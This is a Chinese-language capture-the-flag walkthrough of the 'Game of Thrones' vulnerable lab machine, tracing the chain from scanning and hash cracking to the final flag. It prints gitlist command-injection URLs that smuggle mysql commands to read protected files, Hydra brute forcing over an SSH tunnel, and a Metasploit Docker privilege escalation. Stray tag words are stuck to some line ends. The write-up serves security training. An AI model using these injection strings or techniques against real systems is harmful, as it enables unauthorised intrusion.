靶機說明:php
Game of Thrones Hacking CTF
This is a challenge-game to measure your hacking skills. Set in Game of Thrones fantasy world.css
Goal:html
Get the 7 kingdom flags and the 4 extra content flags (3 secret flags + final battle flag). There are 11 in total.java
Rules/guidelines to play:python
- Start your conquer of the seven kingdoms
- You'll need hacking skills, no Game of Thrones knowledge is required. But if you play, it may contains spoilers of the TV series
- Difficulty of the CTF: Medium-High
- Don't forget to take your map (try to find it). It will guide you about the natural flag order to follow over the kingdoms
- Listen CAREFULLY to the hints. If you are stuck, read the hints again!
- Powerful fail2ban spells were cast everywhere. Bruteforce is not an option for this CTF (2 minutes ban penalty)
- The flags are 32 chars strings. Keep'em all! you'll need them
Requirements/starting guide:mysql
- Import the Linux based CTF challenge virtual machine (OVA file)
- OVA file is compatible with Oracle Virtualbox and Vmware
- The challenge vm needs 1 cpu and 1512mb RAM to work properly
- The challenge vm has its network configured by default as bridge. It will take an IP from the DHCP of your network
Downloading challenge CTF vm:linux
- Download Link 1 (Mega)
- Mirror 1 (Dropbox)
Troubleshootinggit
- Vmware:
- If you get a warning/error importing machine, press "Retry" and it will be imported flawlessly
- Oracle Virtualbox
- It's recommended to use "Import Appliance" menu option instead of double click on OVA file
- If you get an error regarding network, just select your network interface
Good luck, the old gods and the new will protect you!
_____ ___ _____ _ | __|___ _____ ___ ___| _| |_ _| |_ ___ ___ ___ ___ ___ | | | .'| | -_| | . | _| | | | | _| . | | -_|_ -| |_____|__,|_|_|_|___| |___|_| |_| |_|_|_| |___|_|_|___|___|
靶機滲透:github
本次採用parrot linux+windows10來做爲攻擊機,攻擊機IP地址爲:192.168.0.112web
靶機與攻擊機在同一網段,咱們先用nmap掃描出靶機的IP地址:
由於我用VM打開靶機,因此發現靶機IP爲:192.168.0.161
而後咱們使用nmap對這個IP進行深度掃描:
能夠發現靶機開啓了不少端口:21,22,53,80,143,3306,5432,10000
咱們嘗試訪問一下靶機主頁面:
咱們先查看源代碼:
...有一堆看起來很與價值的東西...通過百度翻譯...shit..咱們接着看:
咱們嘗試使用kali裏面的dirb來對靶機目錄進行爆破:
發現不少目錄:
- http://192.168.0.161/css/
- http://192.168.0.161/favicon.ico
- http://192.168.0.161/imgs/
- http://192.168.0.161/index.php
- http://192.168.0.161/robots.txt
- http://192.168.0.161/sitemap.xml
還有比較奇怪的目錄:
- http://192.168.0.161/h/i/d/d/e/n/index.php
咱們先查看一下比較敏感的 robots.txt :
裏面有三個目錄:/the-tree/,/secret-island/,/direct-access-to-kings-landing/,
還有個User-agent:Three-eyed-raven
咱們先依次訪問那三個目錄:
咱們點擊Map:
咱們仔細研究一下這張地圖:
上面記錄了本次遊戲的關鍵點和目標,除了常規須要獲得7個flag以外,還有3個隱祕flag,
並且最後的戰爭是經過ssh...
咱們訪問下一個目錄:
咱們查看源代碼,看是否有有用的信息:
有這樣一句話:
You mUSt changE your own shape and foRm if you wAnt to GEt the right aNswer from the Three-eyed raven" - Written on the tree by somebody
翻譯:你必須改變本身的形狀和形式,若是你想從Three-eyed-raven那裏獲得正確答案的話--樹上的某我的所寫
看到這個Three-eyed-raven我忽然想到robots.txt裏面的user-agent,提示也說須要改變本身,
會不會是要burp抓包,來替換header頭的user-agent,咱們嘗試:
內容以下:
<!--
"I will give you three hints, I can see the future so listen carefully" - The three-eyed raven Bran Stark
"To enter in Dorne you must identify as oberynmartell. You still should find the password"
"3487 64535 12345 . Remember these numbers, you'll need to use them with POLITE people you'll know when to use them"
"The savages never crossed the wall. So you must look for them before crossing it"
-->
翻譯:
「我會給你三個暗示,我能夠看到將來,因此仔細聽」——The three-eyed raven Bran Stark
「爲了進入Dorne,你必須把本身看成 oberynmartell。你將會找到密碼
「3487 64535 12345。記住這些數字,你須要和有禮貌的人一塊兒使用,你會知道何時使用它們。
「野人歷來沒有穿過牆。因此你必須在過馬路前尋找它們。
...忽然沒頭緒了,這些提示之後作的時候估計就會用到,咱們訪問第三個目錄:
查看源代碼:
內容以下:"I've heard the savages usually play music. They are not as wild as one can expect, are they?" - Sansa Stark
翻譯:「我據說野蠻人常常演奏音樂。它們並不像人們想象的那麼瘋狂,是嗎?」桑莎斯塔克
...忽然沒頭緒了,咱們爆破出了那麼多目錄,咱們訪問幾個比較敏感的:
Music?野獸都能懂?同時考慮一下三眼烏鴉的第一個指示,讓咱們把音樂下載下來,用exiftool查看文件信息:
https://sno.phy.queensu.ca/~phil/exiftool/
能夠看到:Savages secret flag: 8bf8854bebe108183caeb845c7676ae4
咱們獲得第一個隱藏的flag!!! 咱們找一下其餘網頁
咱們忽然發現還有個 raven.php ,嘗試訪問:
還得查看源代碼:
翻譯:穿過牆壁,mcrypt的咒語將幫助你。無論你是誰,只有鑰匙才能打開祕密之門
...咱們繼續訪問目錄:
查看源代碼:
內容以下:
<!--
"My little birds are everywhere. To enter in Dorne you must say: A_verySmallManCanCastAVeryLargeShad0w . Now, you owe me" - Lord (The Spider) Varys
"Powerful docker spells were cast over all kingdoms. We must be careful! You can't travel directly from one to another... usually. That's what the Lord of Light
has shown me" - The Red Woman Melisandre
-->
翻譯:個人小鳥處處都是。要進入Dorne,你必須說:"A_verySmallManCanCastAVeryLargeShad0w . Now, you owe me"——「主(蜘蛛)瓦里斯」
「強大的碼頭法師被鑄造在全部王國上。咱們必須當心!你不能直接從一個旅行到另外一個…一般狀況下。這就是光之主向我展現的——「紅女人梅麗桑德雷
咱們獲得了一個密碼:A_verySmallManCanCastAVeryLargeShad0w 而後根據這個能夠進入Dorne,我想起來提示裏面有
爲了進入Dorne,你必須把本身看成 oberynmartell。你將會找到密碼 這個 oberynmartell 就是用戶名,同時地圖上也有提示:
我感受咱們能夠以oberynmartell的身份嘗試登錄ftp,密碼是:
能夠看到第一個flag已經出現,不過它看起來像md5加密,咱們嘗試解密:
咱們在目錄下發現兩個文件:
咱們把它下載下來:
咱們點開第一個文件:problems_in_the_north.txt :
內容以下:
"There are problems in the north. We must travel quickly. Once there we must defend the wall" - Jon Snow
"What kind of magic is this?!? I never saw before this kind of papirus. Let's check it carefully" - Maester Aemon Targaryen
md5(md5($s).$p)
nobody:6000e084bf18c302eae4559d48cb520c$2hY68a
很明顯要用上面的方法對下面的密碼進行解密。
加密方式是:md5(md5($salt).$pass)
6000e084bf18c302eae4559d48cb520c$2hY68a
經過查閱資料(hashcat official wiki),這種加密方式只在hashcat-legacy 中支持。
同時發現,根據工具支持的格式,拿到的hash還須要把」$」改成」:」
6000e084bf18c302eae4559d48cb520c:2hY68a
把上述hash保存在pass.txt中
github中的地址爲:https://github.com/hashcat/hashcat-legacy
可是能夠看到,最新版的hashcat已經去掉了這種加密方式的破解,因此咱們還得找一箇舊版本
https://hashcat.net/files_legacy/hashcat-2.00.7z
咱們尋找加密方式是:md5(md5($salt).$pass) 的編號:
結合咱們kali上自帶的字典 rockyou.txt ,便可成功解出hash:
成功解密,獲得密碼爲: stark
我i們同時獲得的還有一個加密文件:the-wall.txt.nc 忽然想起另一個提示:
穿過牆壁,mcrypt的咒語將幫助你。無論你是誰,只有鑰匙才能打開祕密之門
感受咱們可使用mcrypt來穿過牆壁,也就是解密,密碼就是stark:
OK!解密成功:
內容以下:
"We defended the wall. Thanks for your help. Now you can go to recover Winterfell" - Jeor Mormont, Lord Commander of the Night's Watch
"I'll write on your map this route to get faster to Winterfell. Someday I'll be a great maester" - Samwell Tarly
http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------
Enter using this user/pass combination:
User: jonsnow
Pass: Ha1lt0th3k1ng1nth3n0rth!!!
翻譯:
「咱們守護了牆。謝謝你的幫助。如今你能夠去尋找Winterfell-傑爾莫爾蒙,夜守望司令
「我會在你的地圖上寫下這條路線,以更快地到達臨冬城。「有一天我會成爲一個偉大的大師」——約翰·C·布萊德利
http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------
使用此用戶/ 密碼進入:
用戶:jonsnow
密碼:Ha1lt0th3k1ng1nth3n0rth!!!
裏面有個網址,咱們嘗試直接訪問:
咱們把這個網址添加到 /etc/hosts 中,並再次訪問:
咱們使用上面找到的用戶名和密碼登陸,看到一個包含了兩個圖像的頁面,是雪諾和北境旗標:
查看源代碼,看是否有提示:
內容以下:
<!--
Welcome to Winterfell
You conquered the Kingdom of the North. This is your second kingdom flag!
639bae9ac6b3e1a84cebb7b403297b79
"We must do something here before travelling to Iron Islands, my lady" - Podrick Payne
"Yeah, I can feel the magic on that shield. Swords are no more use here" - Brienne Tarth
-->
翻譯:
歡迎來到Winterfell
你征服了北方的王國。這是你的第二個flag!
639bae9ac6b3e1a84cebb7b403297b79
「在咱們去Iron Islands以前,咱們必須作點什麼,個人夫人」——Podrick Payne
「是的,我能感受到那個盾牌的魔力。刀劍在這裏再也不有用了——「- Brienne Tarth
咱們成功獲得第二個flag!而且根據提示這個盾牌的盾徽是個突破口,咱們把這個圖片下載下來:
用文本文件打開,在最後會出現這樣一段話:
內容以下:
Timef0rconqu3rs TeXT should be asked to enter into the Iron Islands fortress" - Theon Greyjoy
翻譯:
Timff0Run3Rs文本應被要求進入 Iron Islands fortress「- Theon Greyjoy
看來,下一步的關鍵點已經有了,結合地圖上對第三個flag的提示:
第三個目標在DNS上,而上面的暗示指出TXT記錄可能包含些什麼,這時咱們可使用nslookup工具對dns記錄進行查看。
nslookup最簡單的用法是查詢域名對應的IP地址,能夠查詢包括A記錄、MX記錄、NS記錄、CNAME記錄、TXT記錄。
格式爲:nslookup -q = txt 域名 IP
這樣,咱們構造一個命令,查看一下靶機dns的txt記錄,獲得第三個flag:
內容以下:
Server: 192.168.0.161
Address: 192.168.0.161#53
Timef0rconqu3rs.7kingdoms.ctf text = "You conquered Iron Islands kingdom flag: 5e93de3efa544e85dcd6311732d28f95. Now you should go to Stormlands at http://stormlands.7kingdoms.ctf:10000 . Enter using this user/pass combination: aryastark/N3ddl3_1s_a_g00d_sword#!"
翻譯:
服務器:192.1680.161
地址:192.1680.161×53
你征服了Iron Islands ,flag:5e93de3efa544e85dcd6311732d28f95。如今你應該去風暴地帶:http://stormlands.7kingdoms.ctf:10000。
使用這個用戶/密碼通行:aryastark/N3ddl3_1s_a_g00d_sword#!
咱們獲得第三個flag!
又是一個網址提示,咱們依然把它添加到 /etc/hosts 中,而且嘗試訪問10000端口:
使用用戶密碼登錄,在主頁面發現了這樣的flag提示:
查看源代碼也沒有什麼發現,咱們點擊File Manager :
瀏覽器還得支持java...,建議到IE中操做...我就不操做了
參考:http://www.freebuf.com/articles/web/175048.html
另外一種方法:
根據地圖中的提示發現:
stormlands接口是Webmin。
一旦鏈接,顯示版本號:Webmin拼寫版本:1.590
我搜索了一下,看看搜索字段中是否有任何缺陷沒有結果。衆所周知,該版本易受攻擊(CVE-2012-2982),Metasploit提供了漏洞利用程序。
內容以下:
Congratulations!you conquered Stormlands.This is your flag:8fc42c6ddf9966db3b09e84365034357
Now prepare yourself for the next challenge!
The credntials to access to the Mountain and the Vale kingdom are:
user/pass: robinarryn/cr0wn_f0r_a_King-_
db: mountainandthevale
pgAdmin magic will notwork. Command line should be used on that kingdom - Talisa Maegyr
翻譯:
祝賀你!你征服了暴風雨,這是你的flag: 8fc42c6ddf9966db3b09e84365034357
如今爲下一個挑戰作好準備吧!
通往Mountain and the Vale kingdom的證書是:
用戶/密碼:robinarryn/cr0wn_f0r_a_King-_
db:mountainandthevale
pgAdmin魔法不會起做用。命令行應該用於那個王國- Talisa Maegyr
咱們成功獲得第四個flag!提示裏面提到了用戶名跟密碼,還有一個db數據庫名稱
咱們看地圖的提示:
..postgresql數據庫,nmap掃描的時候就知道靶機在5432端口運行的是postgresql,
如今這個提示是要咱們訪問數據庫,使用上面找到的文件中提供的用戶名密碼鏈接,咱們嘗試連接:
(postgresql經常使用命令:http://www.javashuo.com/article/p-oipzmkdb-hb.html)
咱們先查看錶的結構:
發現有個flag表,咱們進入這個表,發現一大串base64加密:
咱們嘗試解密:
內容以下:
Nice! you conquered the Kingdom of the Mountain and the Vale. This is your flag: bb3aec0fdcdbc2974890f805c585d432. Next stop the Kingdom of the Reach. You can identify yourself with this user/pass combination: olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah , but first you must be able to open the gates
翻譯:
好極了!你征服了山脈和山谷的王國。這是flag:bb3aec0fdcdbc2974890f805c585d432。下一站,到達Kingdom。你能夠用這個用戶/ 密碼組合來標識本身:olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah,但首先你必須可以打開大門。
咱們獲得第五個flag! 咱們查看postgresql數據庫其餘有用的表:
select * from aryas_kill_list;
有不少名字,也許能用得上。
select * from eyrie;
select * from popular_wisdom_book;
select * from braavos_book;
內容以下:
1 | City of Braavos is a very particular place. It is not so far from here.
2 | "There is only one god, and his name is Death. And there is only one thing we say to Death: Not today" - Syrio Forel
3 | Braavos have a lot of curious buildings. The Iron Bank of Braavos, The House of Black and White, The Titan of Braavos, etc.
4 | "A man teaches a girl. -Valar Dohaeris- All men must serve. Faceless Men most of all" - Jaqen H'ghar
6 | "A girl has no name" - Arya Stark
7 | City of Braavos is ruled by the Sealord, an elected position.
8 | "That man's life was not yours to take. A girl stole from the Many-Faced God. Now a debt is owed" - Jaqen H'ghar
9 | Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc
這個第9個,好像不是英語,好像是rot16編碼,咱們用https://www.rot13.com/嘗試解碼:
內容以下:
The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis
翻譯:
多面的神要你改變你的面貌。他想讓你認出你的殺人名單。根據這本書丟失的頁碼選擇它。鏈接的數據庫將是braavos,您的密碼將是:ValarMorghulis
我忽然想起來咱們的隱藏flag
如今咱們有數據庫,有密碼,咱們須要枚舉一下用戶名,發現TheRedWomanMelisandre是用戶名
咱們來登錄數據庫:
咱們嘗試尋找有用的信息:
select * from temple_of_the_faceless_men;
咱們成功獲得隱藏的第二個flag: 3f82c41a70a8b0cfec9052252d9fd721
text: Congratulations. You've found the secret flag at City of Braavos. You've served well to the Many-Faced God.
根據第五個flag的提示,如今咱們該前往 king of the Reach ,咱們如今知道第六個flag的
用戶名跟密碼:olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah
咱們看地圖有什麼提示:
根據nmap的掃描結果,發現imap運行在143端口,可是這個端口沒有開啓,
前面有個提示:3487 64535 12345。記住這些數字,你須要和有禮貌的人一塊兒使用,你會知道何時使用它們
而咱們在postgresql數據庫的popular_wisdom_book中有這樣的字眼:
好吧,須要敲門,這是一個安全機制,端口敲門服務(knockd),查下資料,看看這是啥。
這個該服務經過動態的添加iptables規則來隱藏系統開啓的服務,使用自定義的一系列序列號來「敲門」。
經過這種方法使系統開啓須要訪問的服務端口,才能對外訪問。
不使用時,再使用自定義的序列號來「關門」,將端口關閉,不對外監聽。進一步提高了服務和系統的安全性。
端口試探(port knocking)是一種經過鏈接嘗試,從外部打開原先關閉端口的方法。一旦收到正確順序的鏈接嘗試,防火牆就會動態打開一些特定的端口給容許嘗試鏈接的主機。
端口試探的主要目的是防治攻擊者經過端口掃描的方式對主機進行攻擊。
端口試探相似於一次祕密握手協議,好比一種最基本的方式:發送必定序列的UDP、TCP數據包。當運行在主機上的daemon程序捕捉到數據包之後,若是這個序列正確,則開啓相應的端口,或者防火牆容許客戶端經過。
因爲對外的Linux服務器經過限制IP地址的方式來控制訪問,所以能夠利用這種端口試探方式來進行防火牆對於訪問IP地址的控制。
如今咱們使用以前在提示中找到的數字3487 64535 12345 ,試圖讓靶機打開143端口,使用knock來敲開端口:
咱們查看143端口是否開啓:
使用netcat鏈接它,咱們使用前面找到的用戶名和密碼:
nc 192.168.0.161 143
獲得的郵件內容以下:
Congratulations!!
You conquered the Kingdom of the Reach. This is the flag: aee750c2009723355e2ac57564f9c3db
Now you can auth on next Kingdom (The Rock, port 1337) using this user/pass combination:
User: TywinLannister
Pass: LannisterN3verDie!
「The things I do for love…」 – Jaime (Kingslayer) Lannister
翻譯:
祝賀你!!
你征服了Kingdom。這是flag:aee750c2009723355e2ac57564f9c3db
如今你能夠在下一個Kingdom(The Rock,端口1337),使用這個用戶/密碼組合:
用戶: TywinLannister
密碼: LannisterN3verDie!
我爲愛作的事……」雅伊姆(國王)蘭尼斯特
咱們已經獲得第六個flag!,而且在提示中獲得登錄1337端口的用戶名跟密碼,
咱們嘗試登錄:
登進來發現是一個gitlist網站,咱們隨便瀏覽發現有提示:
內容以下:
There is a note under the bed. Somebody put it there. It says:
2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874
"The main gates of King's Landing are permanently closed by Queen's order. You must search for another entrance"
- An anonymous friend
翻譯:
牀底下有一張字條。有人把它放在那裏。它說:
2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874
「國王着陸的主要大門是由奎因的命令永久關閉的。你必須尋找另外一個入口
匿名朋友
有一串十六進制的編碼,咱們嘗試解碼:
/home/tyrionlannister/checkpoint.txt 看起來應該是一個有用的txt文檔,可是得不到
Google一下發現gitlist存在一個命令執行漏洞,漏洞詳情:
http://hatriot.github.io/blog/2014/06/29/gitlist-rce/
發現這個漏洞依然存在,太棒了!咱們嘗試直接查看txt文件:
內容以下:
Welcome to: _____ _ _____ _ |_ _| |_ ___ | __ |___ ___| |_ | | | | -_| | -| . | _| '_| |_| |_|_|___| |__|__|___|___|_,_| You are very close to get the flag. Is not here, it's at King's Landing. We must travel there from here! The credentials to access to King's Landing are: user/pass: cerseilannister/_g0dsHaveNoMercy_ db: kingslanding "Chaos isn't a pit. Chaos is a ladder" - Petyr (Littlefinger) Baelish
反正咱們找到去往King's Landing的用戶名跟密碼: cerseilannister/_g0dsHaveNoMercy_ db: kingslanding
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="show tables;" `
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="SELECT * from iron_throne;" `
這個 -..-. . - -.-. -..-. -- -.-- ... --.- .-.. -..-. ..-. .-.. .- --. 明顯是摩斯電碼,在線解密一下:
有flag的蹤跡了!
可是當咱們嘗試去查看這個文件時卻發現文件並不存在,這是怎麼回事?
在摩斯密碼的後面還有一點兒提示,告訴咱們在這裏有特權,看看都有啥:
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="show grants;" `
能夠看到有file、grant、select、insert、create,猜測,咱們有可能須要使用特權把flag的內容導入一個新的表中,這樣咱們就能夠查看了。
技術三聯:
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="CREATE TABLE test (flag TEXT);" `
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="LOAD data INFILE '/etc/mysql/flag' INTO TABLE test;" `
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="select * from test;" `
內容以下:
Congratulations. You conquered the last kingdom flag. This is your flag: c8d46d341bea4fd5bff866a65ff8aea9 Now you must find the Dragonglass mine to forge stronger weapons. Ssh user-pass: daenerystargaryen-.Dracarys4thewin. "All men must die, but we are not men" - Daenerys Stormborn of the House Targaryen, First of Her Name, the Unburnt, Queen of the Andals and the First Men, Khaleesi of the Great Grass Sea, Breaker of Chains, and Mother of Dragons Congratulations. You conquered the last kingdom flag. This is your flag: c8d46d341bea4fd5bff866a65ff8aea9 Now you must find the Dragonglass mine to forge stronger weapons. Ssh user-pass: daenerystargaryen-.Dracarys4thewin. "All men must die, but we are not men" - Daenerys Stormborn of the House Targaryen, First of Her Name, the Unburnt, Queen of the Andals and the First Men, Khaleesi of the Great Grass Sea, Breaker of Chains, and Mother of Dragons
翻譯:
祝賀你。你征服了最後的flag。這是你的flag:c8d46d341bea4fd5bff866a65ff8aea9 如今你必須找到Dragonglass礦,鍛造更強的武器。SSH用戶-密碼:daenerystargaryen-.Dracarys4thewin.。全部的人都必須死去,但咱們不是男人。——Daenerys Stormborn的家塔爾賈揚,她的名字的第一個,未燃燒的,安達爾女王和第一個男人,偉大的草海的哈萊西,鐐銬的破壞者,和龍之母的祝賀。
咱們成功獲得第七個flag!不過提示告訴咱們還沒結束,咱們須要登錄SSH:
用戶:daenerystargaryen
密碼:.Dracarys4thewin.
登錄成功!而且發現 /home/daenerystargaryen 目錄下有兩個文件夾:checkpoint.txt , digger.txt
咱們分別查看:
內容以下:
"Dragonglass. Frozen fire, in the tongue of old Valyria. Small wonder it is anathema to these cold children of the Other" - The Red Woman Melisandre
"Large amounts of Dragonglass can be found on Dragonglass mine (172.25.0.2). The mine can be accessed only from here. We are very close... Fail2ban magic is not present there, maybe we can reach the 'root' of the problem pivoting from outside to use this digger" - Samwell Tarly
"The White Walkers don't care if a man's free folk or crow. We're all the same to them, meat for their army. But together we can beat them" - Jon Snow
提示中說,這裏是通往172.25.0.2的惟一入口,這有多是這裏並無 fail2ban 的功能,這給了咱們暴力破解root權限的可能性,並且還存在digger.txt這個字典,用scp命令把這個文件下載到本地,用Hydra來進行暴破吧:
scp daenerystargaryen@192.168.0.161:/home/daenerystargaryen/digger.txt ./digger.txt
咱們使用本地隧道將其綁定到咱們的22222端口:
ssh daenerystargaryen@192.168.0.161 -L 12345:172.25.0.2:22 -N
如今我使用hydra經過ssh登陸,使用root做爲用戶名,並使用digger.txt文件來爆破密碼:
爆破出root的密碼是: Dr4g0nGl4ss!
咱們使用這個口令來經過ssh登陸,咱們使用localhost進行鏈接,由於咱們已經完成了ssh本地隧道的綁定:
咱們查看這個flag:
內容以下:
Congratulations.
You've found the secret flag of Dragonglass mine. This is your flag: a8db1d82db78ed452ba0882fb9554fc9
Now you have the Dragonglass weapons to fight against the White Walkers.
Host's ssh:
branstark/Th3_Thr33_Ey3d_Raven
"The time has come" - The Three Eyed Raven
咱們獲得了第三個隱藏的flag!可這還不是結束,咱們又獲得了HOST‘s ssh:
branstark/Th3_Thr33_Ey3d_Raven
咱們再次用ssh進行鏈接:
發現這個服務器是基於docker的,搜索一下發現:
https://www.exploit-db.com/exploits/40394/
docker存在一個本地提權漏洞,咱們用metersploit來鏈接:
咱們直接使用的是msf裏面的docker本地提權腳本,如今咱們發現咱們已是root權限
咱們把/root目錄下final_battle文件下載到本地,並打開:
發現裏面有個flag.txt,不過須要密碼才能解開,咱們查看checkpoint.txt看可否發現有用的信息:
內容以下:
To defeat White Walkers you need the help of the Savages, the Many-Faced God skill learned at Braavos and the Dragonglass weapons
Some hints:
type of file = ???
pass = ???
useful-pseudo-code-on-invented-language = concat(substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)), substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)), substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3)))
"Hodor... Hodor!!" - Hodor
虛擬語言的有用僞代碼:
concat(substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)), substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)), substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3)))
須要用到三個secrect flag:
secrect flag1:8bf8854bebe108183caeb845c7676ae4
secrect flag2:3f82c41a70a8b0cfec9052252d9fd721
secrect flag3:a8db1d82db78ed452ba0882fb9554fc9
密碼的公式是:
concat(
substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)),
substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)),
substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3))
)
簡單用python寫段代碼,跑一下:
flag1="8bf8854bebe108183caeb845c7676ae4"
flag2="3f82c41a70a8b0cfec9052252d9fd721"
flag3="a8db1d82db78ed452ba0882fb9554fc9"
password=flag1[len(flag1)-10:len(flag1)]+flag2[len(flag2)-10:len(flag2)]+flag3[len(flag3)-10:len(flag3)]
print "password:" + password
咱們嘗試運行:
能夠獲得密碼爲:45c7676ae4252d9fd7212fb9554fc9
咱們拿去解密final_battal文件:
咱們成功的獲得了最後的flag!!!!
學習總結:
1.在音樂文件中隱藏flag,並用exiftool來分析音頻文件,必定要細心。
2.解密的話可使用john the ripper,不過博主的john老是報john No password hashes loaded (see FAQ)錯誤
,參考https://www.waitalone.cn/john-no-password-hashes-loaded.html,仍是解決不了。。。
3.webmin的版本漏洞,如今有的網頁是java語言,瀏覽器沒有java插件可能致使代碼不全。
4.postgresql數據庫的基本操做語法
5.knock敲門,如今大可能是knockd(apt-get install knockd),也稱端口試探。nc連接143 imap,來檢查郵件傳輸
6.gitlist低版本的命令注入漏洞,能夠本地復現。
7.使用本地隧道將其綁定端口。
8.docker低版本本地提權漏洞,以及msf的漏洞利用。
9.建議在vulnhub下載靶機鏡像,本地練習,作完真的好累
參考資料:
http://www.freebuf.com/articles/web/177562.html